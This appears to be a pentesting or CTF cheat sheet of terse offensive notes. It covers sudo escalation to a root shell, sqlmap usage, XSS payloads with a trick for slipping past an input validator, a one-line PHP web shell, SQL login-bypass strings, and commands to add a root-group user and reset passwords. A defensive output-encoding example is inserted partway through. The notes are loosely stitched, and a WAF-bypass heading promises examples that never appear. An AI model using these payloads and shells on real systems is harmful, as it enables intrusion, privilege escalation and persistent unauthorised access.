sudo -u *username* *command* may give you access to run the command as that user
e.g. sudo -u root /bin/bash
for sql injection with burp, intercept and capture the request, save it as a .req file and give it to sqlmap.
e.g. sqlmap -r login.req --level 5 --risk 3
PAYLOAD+STACK++%3E%27" /Autofocus /Onfocus=confirm1//&error=1
The first part of the payload “PAYLOAD STACK” ensures that the rest of the payload is sent through.
If I entered: ++%3E%27" /Autofocus /Onfocus=confirm1//&error=1 without the words in front of it,
the application would reject it and nothing would appear on the page. Entering something non-malicious to begin with would trick the validator and, in turn, allow the payload to execute.
book.php?name=home%22-confirm1-%22 --- for xss add payload " %22-confirm1-%22 "
Sidenote: If you’re a bug bounty hunter, it’s always best to use alert(document.domain) instead of alert(1) –
it tells you if the payload is actually firing on a domain that is in scope for the program.
"x><img src=a onerror=alert(1)>
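Defender's view of the validation bypass described above, as an added example that is not from the original notes: the prefix-only validator below is a constructed stand-in for a check that only looks at how the input starts, and the fix shown is context-aware output encoding with Python's html.escape rather than trying to spot bad input.

```python
"""Added example: a prefix-only input check versus output encoding.
The naive validator is constructed for illustration; it is not code
from any real application."""
import html
import re

# Constructed naive validator: rejects input only when it *starts* with
# a character that could break out of markup. Input that begins with
# harmless text slips straight through, which is the behaviour the
# notes describe.
def naive_validator_accepts(value: str) -> bool:
    return not re.match(r'^[<>"\']', value)

# Defender's fix: encode on output for the HTML attribute context the
# value lands in. html.escape(quote=True) converts & < > " and ' to
# entities, so the value can never close the attribute or open a tag.
def render_attribute(value: str) -> str:
    return 'value="%s"' % html.escape(value, quote=True)

def breaks_out_of_attribute(rendered: str) -> bool:
    # True if any raw metacharacter survived inside the quoted value.
    inner = rendered[len('value="'):-1]
    return any(ch in inner for ch in '<>"\'')

if __name__ == "__main__":
    # Constructed inputs: the page's payload, and the same payload
    # prefixed with benign text.
    for p in ['"x><img src=a onerror=alert(1)>',
              'hello "x><img src=a onerror=alert(1)>']:
        print(naive_validator_accepts(p), render_attribute(p))
```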
sudo -l --- lists the commands/files you are allowed to run as root
sudo 'the file' bash ..... you are now root
run as root or any user --- sudo -H -u root
sudo -u user -i /bin/bash --- switch user
IPPSEC TIPS
nmap -sC -sV -oA <output-basename> <target>
always run directory enumeration on web applications. you may find something juicy.
host file on local server
python -m SimpleHTTPServer
simple php web reverse shell
<?php system($_GET['gimme']); ?>
STEGANOGRAPHY
strings image.jpg
binwalk image.jpg
steghide extract -sf image.jpg
Bypassing web application firewalls using HTTP headers
There is also a hit-list of *types* of addresses/configurations that *might* be whitelisted/vulnerable. (some fictitious examples below):
sql login bypass
n'or 1=1 limit 1-- -+
'or''='
' or 1=1#
linux add new root user
useradd -m -g root username
change user password
echo username:password | chpasswd
echo "username:newpass"|chpasswd